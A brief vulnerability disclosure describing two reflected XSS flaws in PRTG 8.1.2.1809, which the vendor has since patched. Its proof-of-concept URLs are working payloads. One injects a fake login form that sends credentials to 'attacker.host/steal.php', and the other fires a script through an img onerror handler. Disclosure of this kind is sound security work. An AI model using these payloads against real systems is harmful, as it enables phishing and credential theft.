XSS (Reflected) Bugs in login.htm and error.htm
================================================================
PRTG V8.1.2.1809 (All OS Versions):
http://www.paessler.com/

I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs
are in the login.htm and error.htm documents.

These issues were possible because of a lack of input checking of the errormsg
 and errorurl GET parameters within login.htm. Output encoding
routines were also
not consistently used throughout the application.

PoC:

https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome

https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E

The vendor was very responsive and has fixed these issues in version
8.2.0.1898/189 released on January 17th 2011.

--
Thanks,
Joshua Gimer

---------------------------

http://www.linkedin.com/in/jgimer
http://twitter.com/jgimer